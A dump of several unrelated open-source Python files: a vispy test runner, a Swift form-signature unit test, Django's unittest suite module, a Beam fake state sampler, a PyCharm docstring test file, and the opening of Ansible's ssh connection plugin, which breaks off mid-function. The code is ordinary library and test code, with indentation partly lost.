env.update(dict(_VISPY_TESTING_APP=mode, VISPY_IGNORE_OLD_VERSION='true'))
env_str = '_VISPY_TESTING_APP=%s ' % mode
if len(msg) > 0:
msg = ('%s\n%s:\n%s%s'
% (_line_sep, msg, env_str, extra_arg_string))
print(msg)
sys.stdout.flush()
return_code = run_subprocess(cmd, return_code=True, cwd=cwd,
env=env, stdout=None, stderr=None)[2]
if return_code:
raise RuntimeError('unit failure (%s)' % return_code)
if coverage:
# Running a py.test with coverage will wipe out any files that
# exist as .coverage or .coverage.*. It should work to pass
# COVERAGE_FILE env var when doing run_subprocess above, but
# it does not. Therefore we instead use our own naming scheme,
# and in Travis when we combine them, use COVERAGE_FILE with the
# `coverage combine` command.
out_name = op.join(cwd, '.vispy-coverage.%s' % mode)
if op.isfile(out_name):
os.remove(out_name)
os.rename(op.join(cwd, '.coverage'), out_name)
def _docs():
"""test docstring paramters
using vispy/utils/tests/test_docstring_parameters.py"""
dev = _get_import_dir()[1]
if not dev:
warnings.warn("Docstring test imports Vispy from"
" Vispy's installation. It is"
" recommended to setup Vispy using"
" 'python setup.py develop'"
" so that the latest sources are used automatically")
try:
# this should always be importable
from ..util.tests import test_docstring_parameters
print("Running docstring test...")
test_docstring_parameters.test_docstring_parameters()
except AssertionError as docstring_violations:
# the test harness expects runtime errors,
# not AssertionError. So wrap the AssertionError
# that is thrown by test_docstring_parameters()
# with a RuntimeError
raise RuntimeError(docstring_violations)
def _flake():
"""Test flake8"""
orig_dir = os.getcwd()
import_dir, dev = _get_import_dir()
os.chdir(op.join(import_dir, '..'))
if dev:
sys.argv[1:] = ['vispy', 'examples', 'make']
else:
sys.argv[1:] = [op.basename(import_dir)]
sys.argv.append('--ignore=E226,E241,E265,E266,W291,W293,W503,F999')
sys.argv.append('--exclude=six.py,ordereddict.py,glfw.py,'
'_proxy.py,_es2.py,_gl2.py,_pyopengl2.py,'
'_constants.py,png.py,decorator.py,ipy_inputhook.py,'
'experimental,wiki,_old,mplexporter.py,cubehelix.py,'
'cassowary')
try:
from flake8.main import main
except ImportError:
print('Skipping flake8 test, flake8 not installed')
else:
print('Running flake8... ') # if end='', first error gets ugly
sys.stdout.flush()
try:
main()
except SystemExit as ex:
if ex.code in (None, 0):
pass # do not exit yet, we want to print a success msg
else:
raise RuntimeError('flake8 failed')
finally:
os.chdir(orig_dir)
def _check_line_endings():
"""Check all files in the repository for CR characters"""
if sys.platform == 'win32':
print('Skipping line endings check on Windows')
sys.stdout.flush()
return
print('Running line endings check... ')
sys.stdout.flush()
report = []
import_dir, dev = _get_import_dir()
for dirpath, dirnames, filenames in os.walk(import_dir):
for fname in filenames:
if op.splitext(fname)[1] in ('.pyc', '.pyo', '.so', '.dll'):
continue
# Get filename
filename = op.join(dirpath, fname)
relfilename = op.relpath(filename, import_dir)
# Open and check
try:
with open(filename, 'rb') as fid:
text = fid.read().decode('utf-8')
except UnicodeDecodeError:
continue # Probably a binary file
crcount = text.count('\r')
if crcount:
lfcount = text.count('\n')
report.append('In %s found %i/%i CR/LF' %
(relfilename, crcount, lfcount))
# Process result
if len(report) > 0:
raise RuntimeError('Found %s files with incorrect endings:\n%s'
% (len(report), '\n'.join(report)))
_script = """
import sys
import time
import warnings
import os
try:
import faulthandler
faulthandler.enable()
except Exception:
pass
os.environ['VISPY_IGNORE_OLD_VERSION'] = 'true'
import {0}
if hasattr({0}, 'canvas'):
canvas = {0}.canvas
elif hasattr({0}, 'Canvas'):
canvas = {0}.Canvas()
elif hasattr({0}, 'fig'):
canvas = {0}.fig
else:
raise RuntimeError('Bad example formatting: fix or add `# vispy: testskip`'
' to the top of the file.')
with canvas as c:
for _ in range(5):
c.update()
c.app.process_events()
time.sleep(1./60.)
"""
def _examples(fnames_str):
"""Run examples and make sure they work.
Parameters
----------
fnames_str : str
Can be a space-separated list of paths to test, or an empty string to
auto-detect and run all examples.
"""
import_dir, dev = _get_import_dir()
reason = None
if not dev:
reason = 'Cannot test examples unless in vispy git directory'
else:
with use_log_level('warning', print_msg=False):
good, backend = has_application(capable=('multi_window',))
if not good:
reason = 'Must have suitable app backend'
if reason is not None:
msg = 'Skipping example test: %s' % reason
print(msg)
raise SkipTest(msg)
    # if we're given individual file paths as a string in fnames_str,
    # use those as the fnames; otherwise walk the examples directory
    # and collect every .py file found there
if fnames_str:
fnames = fnames_str.split(' ')
else:
fnames = [op.join(d[0], fname)
for d in os.walk(op.join(import_dir, '..', 'examples'))
for fname in d[2] if fname.endswith('.py')]
fnames = sorted(fnames, key=lambda x: x.lower())
print(_line_sep + '\nRunning %s examples using %s backend'
% (len(fnames), backend))
fails = []
n_ran = n_skipped = 0
t0 = time()
for fname in fnames:
n_ran += 1
root_name = op.split(fname)
root_name = op.join(op.split(op.split(root_name[0])[0])[1],
op.split(root_name[0])[1], root_name[1])
good = True
with open(fname, 'r') as fid:
for _ in range(10): # just check the first 10 lines
line = fid.readline()
if line == '':
break
elif line.startswith('# vispy: ') and 'testskip' in line:
good = False
break
if not good:
n_ran -= 1
n_skipped += 1
continue
sys.stdout.flush()
cwd = op.dirname(fname)
cmd = [sys.executable, '-c', _script.format(op.split(fname)[1][:-3])]
sys.stdout.flush()
stdout, stderr, retcode = run_subprocess(cmd, return_code=True,
cwd=cwd, env=os.environ)
if retcode or len(stderr.strip()) > 0:
# Skipping due to missing dependency is okay
if "ImportError: " in stderr:
print('S', end='')
else:
ext = '\n' + _line_sep + '\n'
fails.append('%sExample %s failed (%s):%s%s%s'
% (ext, root_name, retcode, ext, stderr, ext))
print(fails[-1])
else:
print('.', end='')
sys.stdout.flush()
print('')
t = (': %s failed, %s succeeded, %s skipped in %s seconds'
% (len(fails), n_ran - len(fails), n_skipped, round(time()-t0)))
if len(fails) > 0:
raise RuntimeError('Failed%s' % t)
print('Success%s' % t)
@nottest
def test(label='full', extra_arg_string='', coverage=False):
"""Test vispy software
Parameters
----------
label : str
        Can be one of 'full', 'unit', 'nobackend', 'extra', 'lineendings',
        'flake', 'docs', 'examples', or any backend name (e.g., 'qt').
extra_arg_string : str
        Extra arguments to send to ``pytest``.
coverage : bool
If True, collect coverage data.
"""
if label == 'osmesa':
# Special case for OSMesa, we have to modify the VISPY_GL_LIB envvar
# before the vispy.gloo package gets imported
from ..util.osmesa_gl import fix_osmesa_gl_lib
fix_osmesa_gl_lib()
from ..app.backends import BACKEND_NAMES as backend_names
label = label.lower()
label = 'pytest' if label == 'nose' else label
known_types = ['full', 'unit', 'lineendings', 'extra', 'flake',
'docs', 'nobackend', 'examples']
if label not in known_types + backend_names:
raise ValueError('label must be one of %s, or a backend name %s, '
'not \'%s\'' % (known_types, backend_names, label))
# figure out what we actually need to run
runs = []
if label in ('full', 'unit'):
for backend in backend_names:
runs.append([partial(_unit, backend, extra_arg_string, coverage),
backend])
elif label in backend_names:
runs.append([partial(_unit, label, extra_arg_string, coverage), label])
if label in ('full', 'unit', 'nobackend'):
runs.append([partial(_unit, 'nobackend', extra_arg_string, coverage),
'nobackend'])
if label == "examples":
# take the extra arguments so that specific examples can be run
runs.append([partial(_examples, extra_arg_string),
'examples'])
elif label == 'full':
# run all the examples
runs.append([partial(_examples, ""), 'examples'])
if label in ('full', 'extra', 'lineendings'):
runs.append([_check_line_endings, 'lineendings'])
if label in ('full', 'extra', 'flake'):
runs.append([_flake, 'flake'])
if label in ('extra', 'docs'):
runs.append([_docs, 'docs'])
t0 = time()
fail = []
skip = []
for run in runs:
try:
run[0]()
except RuntimeError as exp:
print('Failed: %s' % str(exp))
fail += [run[1]]
except SkipTest:
skip += [run[1]]
except Exception as exp:
# this should only happen if we've screwed up the test setup
fail += [run[1]]
print('Failed strangely (%s): %s\n' % (type(exp), str(exp)))
import traceback
type_, value, tb = sys.exc_info()
traceback.print_exception(type_, value, tb)
else:
print('Passed\n')
sys.stdout.flush()
dt = time() - t0
stat = '%s failed, %s skipped' % (fail if fail else 0, skip if skip else 0)
extra = 'failed' if fail else 'succeeded'
print('Testing %s (%s) in %0.3f seconds' % (extra, stat, dt))
sys.stdout.flush()
if len(fail) > 0:
raise RuntimeError('FAILURE')
|
eatbyte/Swift
|
refs/heads/master
|
test/unit/cli/test_form_signature.py
|
17
|
# -*- coding: utf-8 -*-
# Copyright (c) 2014 Samuel Merritt <[email protected]>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import hashlib
import hmac
import mock
import unittest
from StringIO import StringIO
from swift.cli import form_signature
class TestFormSignature(unittest.TestCase):
def test_prints_signature(self):
the_time = 1406143563.020043
key = 'secret squirrel'
expires = 3600
path = '/v1/a/c/o'
redirect = 'https://example.com/done.html'
max_file_size = str(int(1024 * 1024 * 1024 * 3.14159)) # π GiB
max_file_count = '3'
expected_signature = hmac.new(
key,
"\n".join((
path, redirect, max_file_size, max_file_count,
str(int(the_time + expires)))),
hashlib.sha1).hexdigest()
out = StringIO()
with mock.patch('swift.cli.form_signature.time', lambda: the_time):
with mock.patch('sys.stdout', out):
exitcode = form_signature.main([
'/path/to/swift-form-signature',
path, redirect, max_file_size,
max_file_count, str(expires), key])
self.assertEqual(exitcode, 0)
self.assertTrue("Signature: %s" % expected_signature
in out.getvalue())
self.assertTrue("Expires: %d" % (the_time + expires,)
in out.getvalue())
sig_input = ('<input type="hidden" name="signature" value="%s" />'
% expected_signature)
self.assertTrue(sig_input in out.getvalue())
def test_too_few_args(self):
out = StringIO()
with mock.patch('sys.stdout', out):
exitcode = form_signature.main([
'/path/to/swift-form-signature',
'/v1/a/c/o', '', '12', '34', '3600'])
self.assertNotEqual(exitcode, 0)
usage = 'Syntax: swift-form-signature <path>'
self.assertTrue(usage in out.getvalue())
if __name__ == '__main__':
unittest.main()
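# For reference (derived from the argument order exercised above), the CLI is
# invoked as:
#
#     swift-form-signature <path> <redirect_url> <max_file_size> \
#         <max_file_count> <expires_in_seconds> <key>
#
# and prints the Expires timestamp, the HMAC-SHA1 Signature, and a ready-made
# hidden <input> element for the signature.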
|
ProfessionalIT/maxigenios-website
|
refs/heads/master
|
sdk/google_appengine/lib/django-1.4/django/utils/unittest/suite.py
|
353
|
"""TestSuite"""
import sys
import unittest
from django.utils.unittest import case, util
__unittest = True
class BaseTestSuite(unittest.TestSuite):
"""A simple test suite that doesn't provide class or module shared fixtures.
"""
def __init__(self, tests=()):
self._tests = []
self.addTests(tests)
def __repr__(self):
return "<%s tests=%s>" % (util.strclass(self.__class__), list(self))
def __eq__(self, other):
if not isinstance(other, self.__class__):
return NotImplemented
return list(self) == list(other)
def __ne__(self, other):
return not self == other
# Can't guarantee hash invariant, so flag as unhashable
__hash__ = None
def __iter__(self):
return iter(self._tests)
def countTestCases(self):
cases = 0
for test in self:
cases += test.countTestCases()
return cases
def addTest(self, test):
# sanity checks
if not hasattr(test, '__call__'):
raise TypeError("%r is not callable" % (repr(test),))
if isinstance(test, type) and issubclass(test,
(case.TestCase, TestSuite)):
raise TypeError("TestCases and TestSuites must be instantiated "
"before passing them to addTest()")
self._tests.append(test)
def addTests(self, tests):
if isinstance(tests, basestring):
raise TypeError("tests must be an iterable of tests, not a string")
for test in tests:
self.addTest(test)
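    # Usage sketch (illustrative only; ``SomeTestCase`` is a hypothetical
    # TestCase subclass): suites are built from already-instantiated tests and
    # then run against a result object.
    #
    #     suite = BaseTestSuite([SomeTestCase('test_a'), SomeTestCase('test_b')])
    #     suite.run(result)   # or simply: suite(result)
    #
    # Note that passing a bare string or an uninstantiated TestCase class
    # raises TypeError, per the checks in addTest()/addTests() above.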
def run(self, result):
for test in self:
if result.shouldStop:
break
test(result)
return result
def __call__(self, *args, **kwds):
return self.run(*args, **kwds)
def debug(self):
"""Run the tests without collecting errors in a TestResult"""
for test in self:
test.debug()
class TestSuite(BaseTestSuite):
"""A test suite is a composite test consisting of a number of TestCases.
For use, create an instance of TestSuite, then add test case instances.
When all tests have been added, the suite can be passed to a test
runner, such as TextTestRunner. It will run the individual test cases
in the order in which they were added, aggregating the results. When
subclassing, do not forget to call the base class constructor.
"""
def run(self, result):
self._wrapped_run(result)
self._tearDownPreviousClass(None, result)
self._handleModuleTearDown(result)
return result
def debug(self):
"""Run the tests without collecting errors in a TestResult"""
debug = _DebugResult()
self._wrapped_run(debug, True)
self._tearDownPreviousClass(None, debug)
self._handleModuleTearDown(debug)
################################
# private methods
def _wrapped_run(self, result, debug=False):
for test in self:
if result.shouldStop:
break
if _isnotsuite(test):
self._tearDownPreviousClass(test, result)
self._handleModuleFixture(test, result)
self._handleClassSetUp(test, result)
result._previousTestClass = test.__class__
if (getattr(test.__class__, '_classSetupFailed', False) or
getattr(result, '_moduleSetUpFailed', False)):
continue
if hasattr(test, '_wrapped_run'):
test._wrapped_run(result, debug)
elif not debug:
test(result)
else:
test.debug()
def _handleClassSetUp(self, test, result):
previousClass = getattr(result, '_previousTestClass', None)
currentClass = test.__class__
if currentClass == previousClass:
return
if result._moduleSetUpFailed:
return
if getattr(currentClass, "__unittest_skip__", False):
return
try:
currentClass._classSetupFailed = False
except TypeError:
# test may actually be a function
# so its class will be a builtin-type
pass
setUpClass = getattr(currentClass, 'setUpClass', None)
if setUpClass is not None:
try:
setUpClass()
except Exception, e:
if isinstance(result, _DebugResult):
raise
currentClass._classSetupFailed = True
className = util.strclass(currentClass)
errorName = 'setUpClass (%s)' % className
self._addClassOrModuleLevelException(result, e, errorName)
def _get_previous_module(self, result):
previousModule = None
previousClass = getattr(result, '_previousTestClass', None)
if previousClass is not None:
previousModule = previousClass.__module__
return previousModule
def _handleModuleFixture(self, test, result):
previousModule = self._get_previous_module(result)
currentModule = test.__class__.__module__
if currentModule == previousModule:
return
self._handleModuleTearDown(result)
result._moduleSetUpFailed = False
try:
module = sys.modules[currentModule]
except KeyError:
return
setUpModule = getattr(module, 'setUpModule', None)
if setUpModule is not None:
try:
setUpModule()
except Exception, e:
if isinstance(result, _DebugResult):
raise
result._moduleSetUpFailed = True
errorName = 'setUpModule (%s)' % currentModule
self._addClassOrModuleLevelException(result, e, errorName)
def _addClassOrModuleLevelException(self, result, exception, errorName):
error = _ErrorHolder(errorName)
addSkip = getattr(result, 'addSkip', None)
if addSkip is not None and isinstance(exception, case.SkipTest):
addSkip(error, str(exception))
else:
result.addError(error, sys.exc_info())
def _handleModuleTearDown(self, result):
previousModule = self._get_previous_module(result)
if previousModule is None:
return
if result._moduleSetUpFailed:
return
try:
module = sys.modules[previousModule]
except KeyError:
return
tearDownModule = getattr(module, 'tearDownModule', None)
if tearDownModule is not None:
try:
tearDownModule()
except Exception, e:
if isinstance(result, _DebugResult):
raise
errorName = 'tearDownModule (%s)' % previousModule
self._addClassOrModuleLevelException(result, e, errorName)
def _tearDownPreviousClass(self, test, result):
previousClass = getattr(result, '_previousTestClass', None)
currentClass = test.__class__
if currentClass == previousClass:
return
if getattr(previousClass, '_classSetupFailed', False):
return
if getattr(result, '_moduleSetUpFailed', False):
return
if getattr(previousClass, "__unittest_skip__", False):
return
tearDownClass = getattr(previousClass, 'tearDownClass', None)
if tearDownClass is not None:
try:
tearDownClass()
except Exception, e:
if isinstance(result, _DebugResult):
raise
className = util.strclass(previousClass)
errorName = 'tearDownClass (%s)' % className
self._addClassOrModuleLevelException(result, e, errorName)
class _ErrorHolder(object):
"""
Placeholder for a TestCase inside a result. As far as a TestResult
is concerned, this looks exactly like a unit test. Used to insert
arbitrary errors into a test suite run.
"""
# Inspired by the ErrorHolder from Twisted:
# http://twistedmatrix.com/trac/browser/trunk/twisted/trial/runner.py
# attribute used by TestResult._exc_info_to_string
failureException = None
def __init__(self, description):
self.description = description
def id(self):
return self.description
def shortDescription(self):
return None
def __repr__(self):
return "<ErrorHolder description=%r>" % (self.description,)
def __str__(self):
return self.id()
def run(self, result):
# could call result.addError(...) - but this test-like object
# shouldn't be run anyway
pass
def __call__(self, result):
return self.run(result)
def countTestCases(self):
return 0
def _isnotsuite(test):
"A crude way to tell apart testcases and suites with duck-typing"
try:
iter(test)
except TypeError:
return True
return False
class _DebugResult(object):
"Used by the TestSuite to hold previous class when running in debug."
_previousTestClass = None
_moduleSetUpFailed = False
shouldStop = False
|
dhalperi/beam
|
refs/heads/master
|
sdks/python/apache_beam/runners/worker/statesampler_fake.py
|
10
|
#
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# This module is experimental. No backwards-compatibility guarantees.
class StateSampler(object):
def __init__(self, *args, **kwargs):
pass
def scoped_state(self, name):
return _FakeScopedState()
class _FakeScopedState(object):
def __enter__(self):
pass
def __exit__(self, *unused_args):
pass
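# Usage sketch (illustrative only; mirrors how the real statesampler is used,
# so instrumented code runs unchanged when sampling is disabled):
#
#     sampler = StateSampler()
#     with sampler.scoped_state('process-bundle'):
#         pass  # timed work would go here; the fake records nothing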
|
leafclick/intellij-community
|
refs/heads/master
|
python/testData/codeInsight/smartEnter/docTypeRType_after.py
|
83
|
def foo(a):
"""
<caret>
@param a:
@type a:
@return:
@rtype:
"""
pass
def foo1():
"""
:return :
"""
|
nrwahl2/ansible
|
refs/heads/devel
|
lib/ansible/plugins/connection/ssh.py
|
4
|
# (c) 2012, Michael DeHaan <[email protected]>
# Copyright 2015 Abhijit Menon-Sen <[email protected]>
# Copyright 2017 Toshio Kuratomi <[email protected]>
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
#
'''
DOCUMENTATION:
connection: ssh
short_description: connect via ssh client binary
description:
- This connection plugin allows ansible to communicate to the target machines via normal ssh command line.
author: ansible (@core)
version_added: historical
options:
host:
description: Hostname/ip to connect to.
default: inventory_hostname
vars:
- name: ansible_host
- name: ansible_ssh_host
host_key_checking:
constants:
- name: HOST_KEY_CHECKING
description: Determines if ssh should check host keys
type: boolean
ini:
- section: defaults
key: 'host_key_checking'
env:
- name: ANSIBLE_HOST_KEY_CHECKING
password:
description: Authentication password for the C(remote_user). Can be supplied as CLI option.
vars:
- name: ansible_password
- name: ansible_ssh_pass
ssh_args:
description: Arguments to pass to all ssh cli tools
default: '-C -o ControlMaster=auto -o ControlPersist=60s'
ini:
- section: 'ssh_connection'
key: 'ssh_args'
env:
- name: ANSIBLE_SSH_ARGS
ssh_common_args:
description: Common extra args for all ssh CLI tools
vars:
- name: ansible_ssh_common_args
ssh_executable:
default: ssh
description:
- This defines the location of the ssh binary. It defaults to `ssh` which will use the first ssh binary available in $PATH.
- This option is usually not required, it might be useful when access to system ssh is restricted,
or when using ssh wrappers to connect to remote hosts.
env: [{name: ANSIBLE_SSH_EXECUTABLE}]
ini:
- {key: ssh_executable, section: ssh_connection}
yaml: {key: ssh_connection.ssh_executable}
const:
- name: ANSIBLE_SSH_EXECUTABLE
version_added: "2.2"
scp_extra_args:
          description: Extra arguments exclusive to the 'scp' CLI
vars:
- name: ansible_scp_extra_args
sftp_extra_args:
          description: Extra arguments exclusive to the 'sftp' CLI
vars:
- name: ansible_sftp_extra_args
ssh_extra_args:
          description: Extra arguments exclusive to the 'ssh' CLI
vars:
- name: ansible_ssh_extra_args
ssh_retries:
# constant: ANSIBLE_SSH_RETRIES
description: Number of attempts to connect.
default: 3
env:
- name: ANSIBLE_SSH_RETRIES
ini:
- section: connection
key: retries
- section: ssh_connection
key: retries
port:
description: Remote port to connect to.
type: int
default: 22
ini:
- section: defaults
key: remote_port
env:
- name: ANSIBLE_REMOTE_PORT
vars:
- name: ansible_port
- name: ansible_ssh_port
remote_user:
description:
- User name with which to login to the remote server, normally set by the remote_user keyword.
              - If no user is supplied, Ansible will let the ssh client binary choose the user as it normally would.
ini:
- section: defaults
key: remote_user
env:
- name: ANSIBLE_REMOTE_USER
vars:
- name: ansible_user
- name: ansible_ssh_user
pipelining:
default: ANSIBLE_PIPELINING
description:
- Pipelining reduces the number of SSH operations required to execute a module on the remote server,
by executing many Ansible modules without actual file transfer.
- This can result in a very significant performance improvement when enabled.
- However this conflicts with privilege escalation (become).
For example, when using sudo operations you must first disable 'requiretty' in the sudoers file for the target hosts,
which is why this feature is disabled by default.
env: [{name: ANSIBLE_SSH_PIPELINING}]
ini:
- {key: pipelining, section: ssh_connection}
type: boolean
vars: [{name: ansible_ssh_pipelining}]
# TODO:
# ANSIBLE_SSH_RETRIES
# self._play_context.private_key_file
# ANSIBLE_SSH_CONTROL_PATH
# ANSIBLE_SSH_CONTROL_PATH_DIR
# DEFAULT_SFTP_BATCH_MODE
# DEFAULT_SCP_IF_SSH
'''
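# Illustrative ansible.cfg snippet for a few of the options documented above
# (an editorial sketch, not part of the original file; section and key names
# follow the ``ini:`` entries in the DOCUMENTATION block):
#
#     [defaults]
#     host_key_checking = False
#     remote_port = 22
#
#     [ssh_connection]
#     ssh_args = -C -o ControlMaster=auto -o ControlPersist=60s
#     pipelining = True
#     retries = 3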
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
import errno
import fcntl
import hashlib
import os
import pty
import socket
import subprocess
import time
from functools import wraps
from ansible import constants as C
from ansible.errors import AnsibleError, AnsibleConnectionFailure, AnsibleFileNotFound
from ansible.errors import AnsibleOptionsError
from ansible.compat import selectors
from ansible.module_utils.six import PY3, text_type, binary_type
from ansible.module_utils.six.moves import shlex_quote
from ansible.module_utils._text import to_bytes, to_native, to_text
from ansible.module_utils.parsing.convert_bool import BOOLEANS, boolean
from ansible.plugins.connection import ConnectionBase, BUFSIZE
from ansible.utils.path import unfrackpath, makedirs_safe
try:
from __main__ import display
except ImportError:
from ansible.utils.display import Display
display = Display()
SSHPASS_AVAILABLE = None
class AnsibleControlPersistBrokenPipeError(AnsibleError):
''' ControlPersist broken pipe '''
pass
def _ssh_retry(func):
"""
Decorator to retry ssh/scp/sftp in the case of a connection failure
Will retry if:
* an exception is caught
* ssh returns 255
Will not retry if
* remaining_tries is <2
* retries limit reached
"""
@wraps(func)
def wrapped(self, *args, **kwargs):
remaining_tries = int(C.ANSIBLE_SSH_RETRIES) + 1
cmd_summary = "%s..." % args[0]
for attempt in range(remaining_tries):
try:
try:
return_tuple = func(self, *args, **kwargs)
display.vvv(return_tuple, host=self.host)
# 0 = success
# 1-254 = remote command return code
# 255 = failure from the ssh command itself
except (AnsibleControlPersistBrokenPipeError) as e:
# Retry one more time because of the ControlPersist broken pipe (see #16731)
display.vvv(u"RETRYING BECAUSE OF CONTROLPERSIST BROKEN PIPE")
return_tuple = func(self, *args, **kwargs)
if return_tuple[0] != 255:
break
else:
raise AnsibleConnectionFailure("Failed to connect to the host via ssh: %s" % to_native(return_tuple[2]))
except (AnsibleConnectionFailure, Exception) as e:
if attempt == remaining_tries - 1:
raise
else:
pause = 2 ** attempt - 1
if pause > 30:
pause = 30
if isinstance(e, AnsibleConnectionFailure):
msg = "ssh_retry: attempt: %d, ssh return code is 255. cmd (%s), pausing for %d seconds" % (attempt, cmd_summary, pause)
else:
msg = "ssh_retry: attempt: %d, caught exception(%s) from cmd (%s), pausing for %d seconds" % (attempt, e, cmd_summary, pause)
display.vv(msg, host=self.host)
time.sleep(pause)
continue
return return_tuple
return wrapped
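# For reference, the back-off used above: the pause before retrying attempt N
# is 2 ** N - 1 seconds, capped at 30 (attempt 0 -> 0s, 1 -> 1s, 2 -> 3s,
# 3 -> 7s, 4 -> 15s, 5 and beyond -> 30s).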
class Connection(ConnectionBase):
''' ssh based connections '''
transport = 'ssh'
has_pipelining = True
become_methods = frozenset(C.BECOME_METHODS).difference(['runas'])
def __init__(self, *args, **kwargs):
super(Connection, self).__init__(*args, **kwargs)
self.host = self._play_context.remote_addr
self.port = self._play_context.port
self.user = self._play_context.remote_user
self.control_path = C.ANSIBLE_SSH_CONTROL_PATH
self.control_path_dir = C.ANSIBLE_SSH_CONTROL_PATH_DIR
# The connection is created by running ssh/scp/sftp from the exec_command,
# put_file, and fetch_file methods, so we don't need to do any connection
# management here.
def _connect(self):
return self
def transport_test(self, connect_timeout):
''' Test the transport mechanism, if available '''
port = int(self.port or 22)
display.vvv("attempting transport test to %s:%s" % (self.host, port))
sock = socket.create_connection((self.host, port), connect_timeout)
sock.close()
@staticmethod
def _create_control_path(host, port, user):
'''Make a hash for the controlpath based on con attributes'''
pstring = '%s-%s-%s' % (host, port, user)
m = hashlib.sha1()
m.update(to_bytes(pstring))
digest = m.hexdigest()
cpath = '%(directory)s/' + digest[:10]
return cpath
@staticmethod
def _sshpass_available():
global SSHPASS_AVAILABLE
# We test once if sshpass is available, and remember the result. It
# would be nice to use distutils.spawn.find_executable for this, but
        # distutils isn't always available; shutil.which() is Python3-only.
if SSHPASS_AVAILABLE is None:
try:
p = subprocess.Popen(["sshpass"], stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
p.communicate()
SSHPASS_AVAILABLE = True
except OSError:
SSHPASS_AVAILABLE = False
return SSHPASS_AVAILABLE
@staticmethod
def _persistence_controls(b_command):
'''
Takes a command array and scans it for ControlPersist and ControlPath
settings and returns two booleans indicating whether either was found.
This could be smarter, e.g. returning false if ControlPersist is 'no',
        but for now we do it the simple way.
'''
controlpersist = False
controlpath = False
for b_arg in (a.lower() for a in b_command):
if b'controlpersist' in b_arg:
controlpersist = True
elif b'controlpath' in b_arg:
controlpath = True
return controlpersist, controlpath
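    # Worked example for the helper above (illustrative): for a command such as
    # [b'ssh', b'-o', b'ControlMaster=auto', b'-o', b'ControlPersist=60s'],
    # the lower-cased substring checks yield (controlpersist=True,
    # controlpath=False), in which case _build_command() below adds a
    # ControlPath argument of its own.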
def _add_args(self, b_command, b_args, explanation):
"""
Adds arguments to the ssh command and displays a caller-supplied explanation of why.
:arg b_command: A list containing the command to add the new arguments to.
This list will be modified by this method.
:arg b_args: An iterable of new arguments to add. This iterable is used
more than once so it must be persistent (ie: a list is okay but a
StringIO would not)
        :arg explanation: A text string explaining why the arguments
were added. It will be displayed with a high enough verbosity.
.. note:: This function does its work via side-effect. The b_command list has the new arguments appended.
"""
display.vvvvv(u'SSH: %s: (%s)' % (explanation, ')('.join(to_text(a) for a in b_args)), host=self._play_context.remote_addr)
b_command += b_args
def _build_command(self, binary, *other_args):
'''
Takes a binary (ssh, scp, sftp) and optional extra arguments and returns
a command line as an array that can be passed to subprocess.Popen.
'''
b_command = []
#
# First, the command to invoke
#
# If we want to use password authentication, we have to set up a pipe to
# write the password to sshpass.
if self._play_context.password:
if not self._sshpass_available():
raise AnsibleError("to use the 'ssh' connection type with passwords, you must install the sshpass program")
self.sshpass_pipe = os.pipe()
b_command += [b'sshpass', b'-d' + to_bytes(self.sshpass_pipe[0], nonstring='simplerepr', errors='surrogate_or_strict')]
if binary == 'ssh':
b_command += [to_bytes(self._play_context.ssh_executable, errors='surrogate_or_strict')]
else:
b_command += [to_bytes(binary, errors='surrogate_or_strict')]
#
# Next, additional arguments based on the configuration.
#
# sftp batch mode allows us to correctly catch failed transfers, but can
# be disabled if the client side doesn't support the option. However,
# sftp batch mode does not prompt for passwords so it must be disabled
# if not using controlpersist and using sshpass
if binary == 'sftp' and C.DEFAULT_SFTP_BATCH_MODE:
if self._play_context.password:
b_args = [b'-o', b'BatchMode=no']
self._add_args(b_command, b_args, u'disable batch mode for sshpass')
b_command += [b'-b', b'-']
if self._play_context.verbosity > 3:
b_command.append(b'-vvv')
#
# Next, we add [ssh_connection]ssh_args from ansible.cfg.
#
if self._play_context.ssh_args:
b_args = [to_bytes(a, errors='surrogate_or_strict') for a in
self._split_ssh_args(self._play_context.ssh_args)]
self._add_args(b_command, b_args, u"ansible.cfg set ssh_args")
# Now we add various arguments controlled by configuration file settings
# (e.g. host_key_checking) or inventory variables (ansible_ssh_port) or
# a combination thereof.
if not C.HOST_KEY_CHECKING:
b_args = (b"-o", b"StrictHostKeyChecking=no")
self._add_args(b_command, b_args, u"ANSIBLE_HOST_KEY_CHECKING/host_key_checking disabled")
if self._play_context.port is not None:
b_args = (b"-o", b"Port=" + to_bytes(self._play_context.port, nonstring='simplerepr', errors='surrogate_or_strict'))
self._add_args(b_command, b_args, u"ANSIBLE_REMOTE_PORT/remote_port/ansible_port set")
key = self._play_context.private_key_file
if key:
b_args = (b"-o", b'IdentityFile="' + to_bytes(os.path.expanduser(key), errors='surrogate_or_strict') + b'"')
self._add_args(b_command, b_args, u"ANSIBLE_PRIVATE_KEY_FILE/private_key_file/ansible_ssh_private_key_file set")
if not self._play_context.password:
self._add_args(
b_command, (
b"-o", b"KbdInteractiveAuthentication=no",
b"-o", b"PreferredAuthentications=gssapi-with-mic,gssapi-keyex,hostbased,publickey",
b"-o", b"PasswordAuthentication=no"
),
u"ansible_password/ansible_ssh_pass not set"
)
user = self._play_context.remote_user
if user:
self._add_args(
b_command,
